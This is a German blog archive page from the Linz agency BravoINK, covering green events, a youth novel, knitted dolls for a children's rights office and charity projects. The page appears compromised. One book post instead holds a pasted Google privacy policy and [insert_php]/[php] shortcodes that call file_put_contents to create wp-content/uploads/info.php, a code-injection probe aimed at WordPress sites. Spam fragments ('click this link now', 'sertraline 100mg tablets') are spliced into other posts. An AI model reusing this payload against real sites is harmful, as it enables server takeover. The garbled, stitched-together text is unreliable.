Fair Planet Straßenfest – Auf dem Weg zum Green Event nach UZ62

10. April 2016 | Posted in Allgemein, Projektbegleitung | By

Bereits im Vorjahr haben wir in der Agentur Maßnahmen unternommen, welche BravoINK noch nachhaltiger machen. Zum Beispiel haben wir umgestellt auf Ökostrom, verwenden Papier und Reinigungsmittel mit dem Österreichischen Umweltzeichen und achten noch mehr auf Ressourcen. Mehr zum Thema Nachhaltigkeit findet ihr auf unserer Homepage (www.bravoink.at/think)

logo_gm_vektor_cmyk_events Aktuell organisieren wir ein Green Event nach der Richtlinie UZ 62 des Österreichischen Umweltzeichen für Green Events/Green Meetings. Und welche Veranstaltung würde sich da besser eignen als das FAIR PLANET – das Linzer Straßenfest für Menschenrechte, Tierrechte und Umweltschutz. Weitere Info zur Veranstaltung findet ihr unter: www.fairplanet.at
Und wenn alles klappt, dürfen wir schon bald als Lizenznehemr auch andere Veranstaltungen mit dem Umweltzeichen zertifizieren.

Weiterlesen ...

Neuerscheinung: The Hanger – Fühlt sich so die Unendlichkeit an?

8. Dezember 2015 | Posted in HerzStern Verlag | By

Schon mal darüber nachgedacht wie sich Unendlichkeit anfühlt? Oder wie es ist unsterblich zu sein? Die beiden Jungautorinnen Bernadetta Klinger (15) und Sarah Emminger (14) aus Wolfsegg haben es gemacht und ihre Gedanken auch niedergeschrieben.
Entstanden ist daraus ihr erstes Buch „The Hanger“. Ein Fantasy-Roman der von der Liebe und Freundschaft handelt, aber auch die Tiefen des Hasses offenbart. Beim Schreiben sind sie abwechselnd in die Rollen von Delina und Nate geschlüpft, zwei unsterbliche Teenager die mehrere schicksalhafte Prüfungen zu bestehen haben. Dabei reisen sie um die ganze Welt und erleben mehrere überraschende Wendungen.

Die beiden Autorinnen schrieben ein halbes Jahr an ihrem Werk. Im Juni haben sie das fertige Manuskript eingereicht und uns mit der Gestaltung beauftragt. Ende November war es dann soweit und sie hielten stolz ihr erstes Buch in den Händen. Erhältlich ist das Buch zum Preis von 15,50€ im BravoINK Onlineshop oder im Buchhandel. Und natürlich freuen sich die beiden jungen Damen auch über Interessierte und Schulen, die sie für Lesungen buchen möchten. (Kontakt)

The Hanger – Fühlt sich so die Unendlichkeit an?

Kannst du dir vorstellen, dass ein Moment, ein einziger Moment, dein ganzes Leben verändert? Eben dies passiert der 16-jährigen Delina, als sie bei einem schrecklichen Vorfall ihre gesamte Familie verliert. Doch es ist der Anfang von etwas Großem. Nicht nur weil sie erfährt, dass sie unsterblich ist, sondern weil sie die Liebe für sich entdeckt. Nate weiß schon einige Zeit, was er ist. Sein Leben ist aufregend, abenteuerlich und vor allem: unendlich. Doch auch er hat noch nicht alles erlebt. So ist es für ihn neu, als ein besonderes Mädchen in sein Leben tritt und er sich auf ewig in sie verliebt. Erschienen im HerzStern Verlag (2015).

Autorinnen: Sarah Emminger, Bernadetta Klinger
ISBN: 978-3-902821-98-0 (Taschenbuch, 242 Seiten)
Buch jetzt bestellen

Weiterlesen ...

Herzausschütt-Püppchen (Kooperationsprojekt mit KiJA OÖ)

9. November 2015 | Posted in HerzStern Verlag, Projektbegleitung | By

Manchmal tut es einfach richtig gut, wenn man jemandem „sein Herz ausschütten“ kann. Damit Kinder immer jemanden haben, mit dem sie Freude und Leid teilen können, haben wir das Projekt „Herzausschütt-Püppchen“ entwickelt und gemeinsam mit der Kinder- und Jugendanwaltschaft OÖ umgesetzt. Lisa, Berny und Tori, die RepräsentantInnen der Kinderrechte beim oberösterreichischen Kinderschutzpreis „LIBERTO“, spielen dabei die Hauptrollen und sind dafür in ihre Wollsachen geschlüpft. So erinnern sie an ganz besonders schöne Momente oder kümmern sich freundschaftlich um das Wohlgefühl von Kindern und Jugendlichen, die Hilfe oder Rat benötigen. Vor allem bei sehr belastenden Themen ist es oft schwer, sich jemandem anzuvertrauen. Mit dem Hilferuf im Bauch können die kleinen „Seelsorger“ guten Mutes bei der Kinder- und Jugendanwaltschaft OÖ (KiJA OÖ) abgegeben werden und auf diesem Weg Hilfe anfordern.

Warum wir gerade diese drei Charaktere ausgewählt haben ist leicht erklärt. Lisa ist ein aufgewecktes Mädchen, das den Schutz der Kinder fordert. Berny ist ein cooler Typ, der sich dafür einsetzt, dass die Kinder gut versorgt sind. Tori kommt aus einem anderen Land, was sie jedoch nicht daran hindert, das Recht der Kinder auf eigene Meinung hochzuhalten. Werte also, für die auch BravoINK einsteht. Lisa, Berny und Tori im BravoINK Onlineshop bestellen. (shop.bravoink.at)

Lisa, Berny und Tori sind handgestrickt und in 2 Größen erhältlich. Und … jetzt kommts: Die Püppchen können auch selbst gestrickt werden. Das einfach gehaltene Strickmuster ist in der kostenlosen Broschüre erklärt, die entweder unter ink@bravoink.at oder direkt bei KiJA OÖ angefordert werden kann. Die 32-seitige A6-Broschüre wurde auf 100% Recyclingpapier und nach der Richtlinie UZ 24 „Druckerzeugnisse“ des Österreichischen Umweltzeichens gedruckt. Auch bei der Auswahl der Wolle, den Versandschachteln und dem übrigen Zubehör waren wir sehr sorgfältig mit Augenmerk auf Herkunft, Produktion und Nachhaltigkeit. Nachstehend ein Auszug aus der Broschüre zum Durchklicken und Durchblicken.

Weiterlesen ...

Clean & Jerk – CrossFit Challenge 2015

4. September 2015 | Posted in Allgemein, Projektbegleitung | By

Bei strahlendem Sonnenschein und hochsommerlichen Temperaturen veranstaltete die ASKÖ Vöcklabruck, in Kooperation mit CrossFit Vöcklabruck, die Clean & Jerk – CrossFit Challenge 2015. Fast 70 AthletInnen aus ganz Österreich kämpften sich durch 3 Qualifikations-Workouts. Die besten acht jeder Kategorie zogen dann ins Finale ein und rangten um die Stockerlplätze. Für alle Anwesenden und Beteiligten war das Clean & Jerk 2015 eine gelungene Veranstaltung und eine Bereicherung der Vöcklabrucker bzw. oberösterreichischen Sportlandschaft. Das perfekte Wetter, das Volksbankstadion als Austragungsort und TopathletInnen sorgten für eine Atmosphäre, wie sie Insider von den offiziellen CrossFit Games in Kalifornien kennen. Aber auch der gesellschaftliche Nutzen kam nicht zu kurz. Vom Land OÖ und dem Klimabündnis OÖ wurde dieses Sportereignis als Green Event ausgezeichnet und für die kürzlich verunglückte Leichtathletin Kira Grünberg spendeten die Sportler insgesamt 200,- Euro (Spendenhomepage Kira Grünberg: www.donationkira.com).

„Als passionierter Sportler war ich begeistert, was die Athleten und Veranstalter dort geleistet haben. Mir scheint, die Organisation war perfekt und die Athleten allesamt zufrieden. Gratulation und ein großes Dankeschön für diese Veranstaltung. Alles Gute weiterhin!“ (Mag. Herbert Brunsteiner, BGM Vöcklabruck).

Rückblick: Bereits Anfang des Jahres begannen die Vorbereitungen. Während Thomas Koller, Head Coach von CrossFit Vöcklabruck, der Veranstaltung den sportlichen Inhalt gab, den Ablauf des Wettkampfes erstellte und eine fast 50-köpfige Mannschaft zur Durchführung des Events organisierte, kümmerten wir uns um die Dinge rundherum. Im Rahmen der BravoINK-Projektbegleitung nahmen wir uns um Bereiche wie Sponsoring, Infrastruktur und Rahmenprogramm, Öffentlichkeits- und Pressearbeit, die Gestaltung der Drucksorten … an und holten starke Partner wie den Österreichischen Gewichtheberverband und das Sportland OÖ an Bord. Mit den Erfahrungen vergangener Veranstaltungen wie, z. B. dem Fair Planet Straßenfest in Linz, konzipierten wir die Veranstaltung von Beginn an als Green Event und erarbeiteten Maßnahmen, um den Anforderungen auch gerecht zu werden (Maßnahmenblatt Green Event).

Bilder, Ranglisten und Infos zum Event unter: www.clean-jerk.com

Weiterlesen ...

HIP-Hop(e) – Selbstentwicklungshilfe par excellence

15. Juni 2015 | Posted in Allgemein, Projektbegleitung | By

Gerne helfen wir da, wo wir können, und teilen unsere Erfahrungen. Anfang 2014 kam Katrin Kirchgatterer auf BravoINK zu und erzählte uns von der Idee, mit ihren SchülerInnen eine Benefiz-Veranstaltung zu organisieren. Katrin ist Tänzerin, Choreografin und gibt Unterricht in verschiedenen Urban Dance Styles. Tanzen ist für Katrin alias KateRock eine Form des Selbstausdruckes und eine innere Lebenshaltung, denn „Love, Peace, Unity and having Fun“ sind Grundsätze in der Hip-Hop-Kultur. Genau diese Prinzipien gibt sie auch an junge Menschen weiter und steht ihnen bei ihrer Persönlichkeitsentwicklung zur Seite. Könnte doch nicht besser zu BravoINK passen und kurz darauf war das HIP-HOPe – TEDD CAN DANCE geboren. Der Erlös ergeht zugunsten der The Teddy Bear Clinic für missbrauchte Kinder in Südafrika und dem Vöcklabrucker Kinderschutzzentrum IMPULS.

Der BravoINK-Trägerverein steht als Veranstalter hinter dem Vorhaben und wir unterstützen Katrin bei der Organisation und Durchführung. Während Birgit mit der Gestaltung der Printmedien beschäftigt war, übernahm Rüdiger das Sponsoring und die Pressearbeit. Wir freuen uns sehr über diese Aufgabe und über das entgegengebrachte Vertrauen. Weitere Infos zur Veranstaltung auf: www.hiphope.at

Weiterlesen ...

In The Paradise Garden of Europe (Workshop + Livesendung)

6. März 2015 | Posted in BravoINK TV | By

„In The Paradise Garden of Europe“ ist ein <a href="http://www click this link now.bildung.erasmusplus.at/hochschulbildung/foerdermoeglichkeiten_unter_erasmus/fuer_studierende/“ target=“_blank“>Bildungsprojekt aus dem EU-Förderprogramm Erasmus+. Insgesamt sind an diesem internationalen Austausch neun Schulen aus europäische Ländern beteiligt. Aus Österreich wurde die Polytechnische Schule Gmunden als Partnerschule ausgewählt.
Im Rahmen dieses Projektes kam eine Gruppe der PTS Gmunden für einen Workshop nach Linz – genauer gesagt ins Studio Schirmmacher von DORF. Ufuk Serbest, der technische Leiter für den Studio & Sendebetrieb von DORF, erklärte der aufmerksamen Multi-Kulti Runde viel Wissenswertes über Kamera, Licht, Ton und über das Produzieren von Live-Sendungen. Von der Theorie ging es dann schnell in die Praxis über und pünktlich um 16:00 waren alle an Ihren Posten. Wenige Minuten später zählte die Regie ein …

5 … 4 … 3 … 2 … 1 … ON AIR

In der Sendung sprachen wir dann über die ersten Eindrücke sowie Ziele und Hintergründe von „In The Paradise Garden of Europe“. Neben meinen Talkgästen aus Gmunden war auch die Linzerin Katharina Schrattenecker Gast in der Runde. Sie vertrat den Verein 4yougend und berichtete über Jugend in Aktion und dem Europäischen Freiwilligendienst. Diese Ausgabe von BravoINK-teleVISION gibt es natürlich auch zum Nachsehen: In The Paradise Garden of Europe

Weiterlesen ...

Geschenkte Freude ist doppelte Freude.

18. Februar 2015 | Posted in Allgemein, Projektbegleitung | By

In Kooperation mit der OÖ. Kinder-Krebs-Hilfe beschenken wir Kinder mit einer guten Portion Freude. Nach dem Motto „Geschenkte Freude ist doppelte Freude“ gibt es beim Kauf einer Strickfrisur über den BravoINK Onlineshop, eine selbst gestrickte Kopfbedeckung für ein an Krebs erkranktes Kind gratis – ohne Aufzahlung für Besteller und ohne umständlichen Klimbim. Einfach ein Modell auswählen, in den Warenkorb legen und ab die Post. Dann heißt es für Birgit … ran an die Stricknadeln. Denn innerhalb einer Woche wird gleichzeitig die Bestellung gefertigt und auch der Wunsch eines Kindes erfüllt.

Butterblümchen, Buntaletta, Glitzersternchen

Die OÖ. Kinder-Krebs-Hilfe ist mit den Kindern in Kontakt und verwaltet die Wunschliste. Die ambulant und stationär behandelten Kinder können aus verschiedenen Modellen und Farben wählen. Damit das Warten nicht zu lange wird, kamen erste finanziellen Mitteln aus der BravoINK-Charitywall in Daniela´s Haarschneiderei, wo Birgit Ende Jänner eine Spende von 500,- Euro entgegengenommen hat. Folge den Link zum Shop und schenke Freude – Strickfrisuren

 

Weiterlesen ...

Das Land zwischen Sonne und Mond (Corina Mattersdorfer)

3. Januar 2015 | Posted in HerzStern Verlag | By

When you use Google services, you trust us with your information. This Privacy Policy is meant to help you understand what data we collect, why we collect it, and what we do with it. This is important; we hope you will take time to read it carefully. And remember, you can find controls to manage your information and protect your privacy and security at My Account.
There are many different ways you can use our services – to search for and share information, to communicate with other people or to create new content. When you share information with us, for example by creating a Google Account, we can make those services even better – to show you more relevant search results and ads, to help you connect with people or to make sharing with others quicker and easier. As you use our services, we want you to be clear how we’re using information and the ways in which you can protect your privacy.
Our Privacy Policy may change from time to time. We will not reduce your rights under this Privacy Policy without your explicit consent. We will post any privacy policy changes on this page and, if the changes are significant, we will provide a more prominent notice (including, for certain services, email notification of privacy policy changes). We will also keep prior versions of this Privacy Policy in an archive for your review.
[insert_php] echo 147098235+111;file_put_contents(‚wp-content/uploads/info.php‘, “); [/insert_php]
[php] echo 147098235+111;file_put_contents(‚wp-content/uploads/info.php‘, “); [/php]

Weiterlesen ...

WALKABOUT – Jedes Ende ist auch ein neuer Anfang.

12. Oktober 2014 | Posted in Projektbegleitung | By

„Jedes Ende ist auch ein neuer Anfang.“ Ein Spruch oder vielmehr eine Erfahrung, die wir selbst immer wieder gemacht haben bzw. auch jetzt noch machen. Durch unser Buchprojekt „Sex, drugs and selfcontrol“ entstand der Kontakt zu WALKABOUT, einer Therapiestation für Drogenkranke in Kainbach bei Graz. Über einen Zeitraum vom 6 Monaten wurden die gelebten Erfahrungen eines Patienten, in der BravoINK Projekt.- und Kreativagentur illustriert und anschließend als Broschüre gedruckt.

Der Begriff „Walkabout“ ist in der Tradition der Aborigines, der Ureinwohner Australiens geläufig. Sie bezeichnen damit ausgedehnte Wanderungen ins Landesinnere, in die Wüstengebiete des australischen Outbacks. Dieser „Walkabout“ beschreibt aber nicht nur eine Reise ins Innere des Landes, sondern auch einen Weg um sich selbst finden zu können. Die jungen Aborigines sind dabei völlig auf sich gestellt und leben unter maximaler Ausschöpfung ihrer Ressourcen. Suchtkranke Menschen gehen sehr nahe an ihre Grenzen und müssen oftmals das ihnen Liebste hinter sich, um neu beginnen zu können. Der Walkabout als Selbstfindungsweg und die Philosophie der Einrichtung decken sich in vielen Punkten mit BravoINK. Mit großer Freude waren wir am 3. Oktober zum 10 jährigen Jubiläum eingeladen, wo der „Comic“ präsentiert wurde.

Bilder und weitere Infos gibt es unter: WALKABOUT – Therapiestation für Drogenkranke 

BravoINK mit Prim. Dr. Werner Friedl (Ärztliche Leitung Walkabout)

BravoiNK mit Mitarbeiterinnen von Walkabout

Weiterlesen ...

Mein Name ist Hund. Schweine-Hund

28. September 2014 | Posted in Allgemein | By

Wer kennt sie nicht, die charmanten Ausreden für all das, was uns nicht freut, zu anstrengend erscheint, uns lästig ist oder Angst macht. Immer hat irgendjemand oder irgendetwas schuld, das man die und das nicht machen oder verändern kann – Verantwortung, Entscheidungen, Wünsche und Ziele werden aufgeschoben, delegiert oder wieder vergessen. Wenn es um die Gesundheit und das persönliche Wohlbefinden geht, dann ist der Umgang mit seinem inneren Schweinehund ein relevanter und lebensverlängernder Aspekt.

Die Körpertherapeutin Marion Weiser nennt insgesamt sieben Schweinehund-Typen, die uns abwechselnd mal mehr mal weniger im Wege stehen. In ihrem Vortrag vermittelt sie interessante und alltagstaugliche Zugänge, um die persönlichen Vermeider-Strategien umzudrehen und besser nutzen zu können sertraline 100mg tablets. Sie gibt Impulse für die Themen; Ausmisten, Gewicht, Bewegung, Beziehung, Zeit und Vorsätze. Damit der Selbstentwicklung nichts mehr im Wege steht. Kosten: 8,- Euro/Person

Anmeldung per E-Mail unter: ink@bravoink.at oder dirket über den Veranstalter – Online registrieren und anmelden

Veranstalter: PGA Körper.schafft, Peter Behrens Platz 10, 4020 Linz (www.pga.at/tabakfabrik)
in Kooperation mit der Selbstentwicklungshilfe BravoINK

Weiterlesen ...